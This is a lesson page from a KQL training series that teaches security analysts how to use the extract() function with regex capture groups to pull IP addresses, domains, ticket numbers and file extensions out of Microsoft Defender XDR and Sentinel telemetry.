Agent Foskett Academy • Lesson 26 • Extracting Evidence with extract()

Extracting Evidence with extract()

Sometimes the evidence is not sitting neatly between two predictable pieces of text.
It might be hidden inside a command line, URL, subject line, file path, alert field or custom log message.

This is where extract() becomes useful. Instead of relying on a fixed string layout, defenders can use a regular expression capture group to pull out the value they need.

In this Agent Foskett Academy lesson, you will learn how defenders use the KQL extract() function to find IP addresses, domains, identifiers and other investigation evidence inside Microsoft Defender XDR and Microsoft Sentinel telemetry.

Agent Foskett Academy lesson explaining how to use extract in KQL investigations
Lesson overview

Learn how extract() helps defenders pull evidence from flexible text patterns using regex capture groups.

Understand extract()
Use regex capture groups
Find hidden indicators
🎯 extract() helps when patterns are flexible.
Use it when the evidence follows a recognisable pattern, but the surrounding text is not consistent enough for parse.
Review Lesson 25 →

Why extract() matters

The extract() function searches a string with a regular expression and returns the value from a capture group.

This is useful when the evidence is present, but the surrounding text may change between events.

Instead of manually reading long strings, defenders can extract the exact indicator they need into a clean column.
Find flexible patternsPull values from strings even when the surrounding text changes between events.
Create evidence columnsTurn hidden IP addresses, domains, identifiers and tokens into clear investigation fields.
Support deeper huntingUse extracted values for filtering, summarising, joining and timeline building.

Investigation scenario

An analyst is reviewing suspicious endpoint and email activity after a phishing investigation.

Some command lines contain IP addresses. Some URLs contain suspicious domains. Some email subjects contain case numbers and tracking identifiers.

The formats are not perfectly consistent, so the analyst uses extract() to pull the useful evidence out with regex capture groups.

Step 1 — Extract an IP address from a command line

Use extract() when you need to capture an IP address from a longer command-line string.
extract-ip-from-commandline.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"\d{1,3}(\.\d{1,3}){3}"
| extend ExtractedIP = extract(@"(\d{1,3}(?:\.\d{1,3}){3})", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, FileName, ExtractedIP, ProcessCommandLine
| sort by Timestamp desc

Step 2 — Extract a domain from a URL

URLs can contain useful domain evidence. extract() can capture the host portion for review.
extract-domain-from-url.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
UrlClickEvents
| where Timestamp > ago(30d)
| extend ClickedDomain = extract(@"https?://([^/]+)", 1, Url)
| project Timestamp, AccountUpn, ClickedDomain, Url, ActionType, ThreatTypes
| sort by Timestamp desc

Step 3 — Extract an identifier from an email subject

When a subject line contains a case number, invoice number or ticket reference, extract() can capture just that value.
extract-ticket-from-subject.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
EmailEvents
| where Timestamp > ago(30d)
| extend TicketNumber = extract(@"Ticket[- ]?(\d+)", 1, Subject)
| where isnotempty(TicketNumber)
| project Timestamp, SenderFromAddress, RecipientEmailAddress, TicketNumber, Subject, DeliveryAction
| sort by Timestamp desc

What extract() does

The extract() function has three important parts: the regex pattern, the capture group number and the source field.

The capture group is usually wrapped in brackets. That is the part of the pattern you want KQL to return.
Regex patternThe pattern that describes what you are trying to find inside the string.
Capture groupThe bracketed part of the regex that becomes the extracted value.
Source fieldThe telemetry field being searched, such as ProcessCommandLine, Url or Subject.

Step 4 — Extract a suspicious file extension

extract() can help identify file extensions from paths or filenames when reviewing endpoint telemetry.
extract-file-extension.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
DeviceFileEvents
| where Timestamp > ago(14d)
| extend FileExtension = extract(@"\.([A-Za-z0-9]+)$", 1, FileName)
| where FileExtension in~ ("exe", "dll", "ps1", "vbs", "js")
| project Timestamp, DeviceName, ActionType, FileName, FileExtension, FolderPath
| sort by Timestamp desc

Step 5 — Extract values from additional fields

Some telemetry fields contain long text blobs or dynamic-looking data. extract() can still help when you only need one value.
extract-value-from-additionalfields.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
DeviceEvents
| where Timestamp > ago(7d)
| where AdditionalFields has "RemoteIP"
| extend RemoteIP = extract(@'"RemoteIP"\s*:\s*"([^"]+)"', 1, tostring(AdditionalFields))
| project Timestamp, DeviceName, ActionType, RemoteIP, AdditionalFields
| sort by Timestamp desc

Step 6 — Combine extract() with summarize

Once evidence is extracted into a column, you can count it, group it and identify repeat activity.
extract-and-summarize-domains.kql
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
UrlClickEvents
| where Timestamp > ago(30d)
| extend ClickedDomain = extract(@"https?://([^/]+)", 1, Url)
| where isnotempty(ClickedDomain)
| summarize ClickCount = count(), Users = dcount(AccountUpn) by ClickedDomain
| top 25 by ClickCount desc

Investigator notes

Use extract() when a value follows a pattern but the surrounding text is not reliable enough for parse.

Keep the regex as simple as possible. Start with one value, confirm the extracted column is correct, then build the rest of the investigation around it.
Start simpleTest the capture group against a small set of results before using it across large telemetry sets.
Validate the outputAlways check extracted values before using them in joins, summaries or reports.
Use parse when cleanerIf the source field has a predictable structure, parse may be easier to read and maintain.
🎓 Agent Foskett Academy — Flexible extraction
You now understand how to use extract() to pull useful evidence from flexible text patterns using regex capture groups.
Return to Academy

What you learned

In this lesson, you learned how to use the KQL extract() function to pull evidence from flexible text patterns.
Using extract()Extract IP addresses, domains, identifiers and file extensions from Microsoft security telemetry.
Regex capture groupsUse bracketed capture groups to return the exact part of the pattern that matters.
Knowing when to use itUse extract() when the evidence follows a pattern but the full string structure is not consistent.

Continue your investigation

The next step is learning how to use mv-apply for more advanced multi-value investigations.
Agent Foskett Academy Return to the full Academy learning path and review earlier KQL foundation lessons.
Using matches regex for Pattern Matching Review how defenders use regex matching before extracting the evidence they need.

Continue learning with Extracting Evidence with parse, Working with parse_json(), KQL Threat Hunting Guide and Microsoft Security.

Develop IT. Protect IT. GEMXIT PTY LTD | GEMXIT UK LTD

Extracting Evidence with extract()

Agent Foskett Academy Lesson 26 teaches defenders how to use the KQL extract() function to pull useful evidence from command lines, URLs, subjects, file names and Microsoft security telemetry fields.

Learn KQL extract() for Microsoft Defender XDR and Sentinel

This lesson explains how extract() can support Microsoft Defender XDR and Microsoft Sentinel investigations by using regular expression capture groups to create clear evidence columns for hunting, filtering and reporting.